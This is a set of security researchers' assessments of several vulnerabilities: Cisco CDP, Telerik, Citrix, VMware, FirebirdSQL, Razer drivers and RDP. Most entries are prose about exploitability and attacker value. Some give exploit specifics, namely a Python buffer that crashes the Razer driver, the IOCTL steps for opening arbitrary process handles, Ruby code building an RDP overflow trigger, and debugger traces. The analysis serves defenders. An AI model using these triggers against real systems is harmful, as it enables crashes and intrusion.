An attacker would need to be on the local area network, directly attached to the vulnerable switch running IOS-XR. This is due to CDP traffic not being forwarded across network boundaries. An attacker leveraging this vulnerability would likely either be physically in the building or have compromised a host which is physically in the building. Successful exploitation would create a denial of service condition..

5
Ratings
  • Attacker Value
    High
  • Exploitability
    High
Technical Analysis

This vulnerability is described as a format string vulnerability by the original disclosure notice. This class of vulnerabilities is well documented and relatively reliable to exploit given the necessary primitives.

An attacker would need to be on the local area network, directly attached to the vulnerable switch running IOS-XR. This is due to CDP traffic not being forwarded across network boundaries. An attacker leveraging this vulnerability would likely either be physically in the building or have compromised a host which is physically in the building. Successful exploitation could create a denial of service or allow the attacker to hop VLANs. The later is effectively bypassing segmentation and would be of great concern within PCI environments where segmentation is mandated through regulations. Additionally due to the affected device being a router, it’s possible that an attacker could use this vantage point to manipulate, intercept and eavesdrop on traffic.

9
Ratings
  • Attacker Value
    Medium
  • Exploitability
    High
Technical Analysis

This vulnerability is described as a “Stack overflow” by the original disclosure notice.

An attacker would need to be on the local area network, directly attached to the vulnerable switch running NX-OS. This is due to CDP traffic not being forwarded across network boundaries. An attacker leveraging this vulnerability would likely either be physically in the building or have compromised a host which is physically in the building. Successful exploitation could create a denial of service of allow the attacker to hop VLANs. The later is effectively bypassing segmentation and would be of great concern within PCI environments where segmentation is mandated through regulations.

5
Ratings
  • Attacker Value
    Medium
  • Exploitability
    High
Technical Analysis

This vulnerability originally outlined by bishopfox is a variation on CVE-2017-11317. The patch for CVE-2017-11317 introduced encryption on the object which prevents an attacker from modifying the object in such a way to achieve file upload as the original did. This mitigation, however uses a default value for the encryption key of PrivateKeyForEncryptionOfRadAsyncUploadConfiguration that if left unchanged can be used to encrypt an object to reproduce similar conditions to CVE-2017-11317. With the ability to upload an arbitrary file, a Mixed Mode Assembly can be uploaded to achieve RCE through the deserializeation functionality in `JavaScriptSerializer.

Users should change their encryption key (as recommended by Telerik) to a strong password and restart their server to mitigate this vulnerability. At that point an attacker would have to recover that secret value to leverage this attack chain. Versions after and including R2 2017 SP1 are not configured with a default encryption key, making exploiting this dependent on recovering the key through another means.

Mitigation Strength set to 3/5 due to it being dependent on the strength of the password.

3
Ratings
  • Attacker Value
    Medium
  • Exploitability
    High
Technical Analysis

The attacker utility for this particular vulnerability is limited by the hardware dependency. Additionally the vulnerability as described in the original disclosure can not be used for privilege escalation, only VMWare escapes.

The vmware-vmx.exe process on the host OS runs as the user which started VMware which is why the vulnerability would not yield SYSTEM privileges on the host. At the time of this writing, the vmware-vmx.exe process does not utilize the new Control Flow Guard which would make it easier to overwrite an entry in the vtable with a function pointer, aiding in exploit development.

While a failed exploit attempt would not crash the host OS because the vulnerability is not kernel mode, the VMWare guest maybe affected and become unresponsive.

1
Ratings
  • Attacker Value
    Low
  • Exploitability
    Very High
Technical Analysis

The request to /gateway.php references a vulnerable function LSRoom_Remoting.doCommand within the encoded AMF data. The original parameter for the vulnerable function is “pref -l /var/system/upgrade/status” Replace this part with the command to be executed. Authentication to the web application is not necessary however a valid PHP session ID must be passed within the request.

1
Ratings
  • Attacker Value
    Medium
  • Exploitability
    Very High
Technical Analysis

The FirebirdSQL server is vulnerable to a stack buffer overflow that can be triggered when an unauthenticated user sends a specially crafted packet. The result can lead to remote code execution as the user which runs the FirebirdSQL server.

A lack of ASLR in some modules makes exploiting this vulnerability easier as memory locations do not need to be leaked. If the service crashes, it will automatically be restarted in the default configuration.

1
Ratings
  • Attacker Value
    Medium
  • Exploitability
    High
Technical Analysis

The SQL injection vulnerability is boolean-based blind. Exploitation is relatively simple but the attacker needs to be able to authenticate to Wordpress and possess the privileges to create a new post to attach the vulnerable widget.

5
Ratings
  • Attacker Value
    High
  • Exploitability
    Very High
Technical Analysis

This vulnerability appears to be based on a web request to a /vpns/ resource containing a directory traversal reference. The traversal reference seems to grant access to the admin portal. This specifically is blocked by the skip_systemaccess_policyeval flag in the interim fix published by Citrix. Based on what information is available publicly, the vulnerability can be exploited to gain code execution on the Citrix server without authentication information. This would be very useful to an attacker because it could be exploited remotely, without authentication and due to the nature of Citrix servers often having a lot of traffic which could facilitate an attacker’s efforts to obfuscate their activity.

In some environments, Cirtix servers may not be patched as frequently as other systems due to their mission critical nature of providing applications for external users. In this case, attackers may have an easier time in escalating their privileges once code execution has been obtained. This would only be necessary if the initial vector did not already yield NT_AUTHORITY\SYSTEM privileges which the current information does not specify.

2
Ratings
  • Attacker Value
    Low
  • Exploitability
    Very High
Technical Analysis

A vulnerability exists within the Razer Synapse driver rzpnk.sys in the IOCTL dispatch routine for 0x226048 that can allow an attacker to pass an input buffer which can trigger an out of bounds read operation. A handle can be opened to issue this IOCTL from \\.\47CD78C9-64C3-47C2-B80F-677B887CF095. The result will cause a denial of service condition on the system in the form of a blue screen of death (BSOD).

The first four bytes of the buffer are used as the size, first to allocate space and then to read from the source. Since the allocation is of the proper size, an out of bounds write can not be accomplished. If however the specified size is larger than the buffer, then the memcpywill continue to read data after the buffer ends.

Build the buffer to trigger the exception in Python:

# the first 4 bytes are the size then it must be padded to at least 0x220 bytes
buffer_ = struct.pack('I', 0x70000000) + (b'\x00' * 0x21c)

Proof of Concept code:
https://gist.github.com/zeroSteiner/829c313b942f944375b67a6535f01992#file-cve_2017_9770-py

3
Ratings
  • Attacker Value
    High
  • Exploitability
    Very High
Technical Analysis

Analysis

The Razer rzpnk.sys driver exposes a device \\.\47CD78C9-64C3-47C2-B80F-677B887CF095 which can be used to open an handle to an arbitrary process from any user. A user needs to open a handle to this device and issue NtDeviceIoControlFile using the IOCTL 0x22a050 to trigger the vulnerable code path. The buffer to be passed to the process is the target PID to open and 0 packed as two QWORD values (buffer = [pid, 0].pack('QQ'). This ultimately leads to a call to ZwOpenProcess which does not perform as many security checks as NtOpenProcess, thus allowing a user to open a handle to an arbitrary process.

To gain code execution from this vulnerability, the user32!LockWindowStatoin function can be hooked within the winlogon process. This process and function are ideal targets because winlogon runs as NT_AUTHORITY\SYSTEM and the function can be triggered on demand. As a by product of exploiting this, the screen will be locked, which may tip off an observant user who is interacting with the system at the time of exploitation.

Exploitation of this vulnerability is quite reliable as it does not rely on memory corruption.

References

3

By causing a crash, yes. Without causing a crash, not that I am currently aware of. This is because the DynVC channel does not send meaningful responses to channel write requests, e.g. the server won’t respond that the channel write failed because the data was corrupted.

What might warrant further investigation would be the Server Error Reporting functionality as described in MS-RDPBCGR Section 3.3.5.7. From my limited testing, this wasn’t going to be feasible because bad writes to DynVC channels aren’t reported.

15
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Medium
Technical Analysis

Analysis performed using rdpcorets.dll from Windows 8.1 x64 (sha256: c9d1f3c0a9459c67e96115041d622808decc31f9a9b7e3b4806421557f09cda1)

The vulnerability exists within rdpcorets.dll loaded in the process svchost.exe -k NetworkService running as NT AUTHORITY\NETWORK SERVICE. This is started by the service “Remote Desktop Services”.

The bug is triggered by sending a specially crafted request over the drdynvc channel which must be setup. Use the flags RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP when initializing it.

After the DynVC channel has been initialized, the overflow is triggered by sending segmented data (DYNVC_DATA_COMPRESSED) frame, see MS-RDPEDYC:25 for details. Note that segmented data is different than a data segment.

The compressed frame includes a payload as defined in MS-RDPEGFX section 2.2.5. The below snippet can be used to build a compatible data segment. The RDP segmented data field contains a length field which is the root cause of the vulnerability.

  # see [MS-RDPEGFX] section 2.2.5.2
  def build_rdp_data_segment(data)
    # RDP_DATA_SEGMENT
    encoded = [data.length + 1].pack("L<")
    encoded << "\x04"
    encoded << data
  end

  def build_trigger
      # see [MS-RDPEGFX] section 2.2.5
      rdp_data_segment = build_rdp_data_segment(("\x41" * 0x50) + [0xdead1337dead1337].pack('Q'))
      rdp_segmented_data = [0xe1, 1, 0x40 - 0x2000].pack("CS<l<") + rdp_data_segment
  end

An object needs to be created and corrupted, potential candidates are below.

Object Name Breakpoint Address Size Can Create?
CRdpDynVCMgr ChannelInternal rdpcorets+c8e03 0x138 Static number can be created
DecompressRdp8 rdpcorets+16274a 0x68
DecompressUnchopper rdpcorets+12dd1a 0x48

Relevant Breakpoints

  • rdpcorets+f67dc ".printf \"CRdpDynVCMgr::HandleIncomingDvcData\\n\"; db rdx"
  • rdpcorets+1dcc89 ".printf \"memcpy(dst=%N, src=%N, size=%N)\\n\", rcx, rdx, r8; g
    • memcpy call that copies the buffer to the target and overflows it
  • rdpcorets+c9538 ".printf \"CRdpDynVC::Initialize\\n\"; g"
    • Watch object creation instances
  • msvcrt+1e00 ".printf \"operator new(size=%N)\", rcx; gu; .printf \" = %N\\n\", rax; g"

Read Access Violation

The following stack trace was taken during a RAV after having corrupted an object using the target memcpy call.

0:001> g
(138c.13b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
0:033> k
Child-SP          RetAddr           Call Site
00000050`beaaf478 00007fff`a5b79c7f rdpcorets+0xd9d36
00000050`beaaf480 00007fff`a5b7c3bf rdpcorets+0xd9c7f
00000050`beaaf4c0 00007fff`a5b91190 rdpcorets+0xdc3bf
00000050`beaaf5f0 00007fff`a5b90cb1 rdpcorets+0xf1190
00000050`beaaf690 00007fff`a5bf2893 rdpcorets+0xf0cb1
00000050`beaaf720 00007fff`c9ed13d2 rdpcorets!DllGetClassObject+0x75b3
00000050`beaaf7e0 00007fff`caf654f4 KERNEL32!BaseThreadInitThunk+0x22
00000050`beaaf810 00000000`00000000 ntdll!RtlUserThreadStart+0x34
0:033> u
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx
00007fff`a5b79d3a 498d5028        lea     rdx,[r8+28h]
00007fff`a5b79d3e 41c7401038000000 mov     dword ptr [r8+10h],38h
00007fff`a5b79d46 4d89481c        mov     qword ptr [r8+1Ch],r9
00007fff`a5b79d4a 45894824        mov     dword ptr [r8+24h],r9d
00007fff`a5b79d4e 8d0c8510000000  lea     ecx,[rax*4+10h]
00007fff`a5b79d55 4803ca          add     rcx,rdx
00007fff`a5b79d58 44890a          mov     dword ptr [rdx],r9d
0:033> r
rax=0000000000000000 rbx=00007fffa5b79d10 rcx=00000050bf0c1940
rdx=0000000000000001 rsi=00000050bdcba9a0 rdi=00000050bf0c1940
rip=00007fffa5b79d36 rsp=00000050beaaf478 rbp=00000050bf0c7450
 r8=4141414141414141  r9=0000000000000000 r10=0000000000000007
r11=00000050beaaf4b8 r12=00000050bf0c1f40 r13=00000050bf0c23c0
r14=0000000000000000 r15=00000050bdccfdc0
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????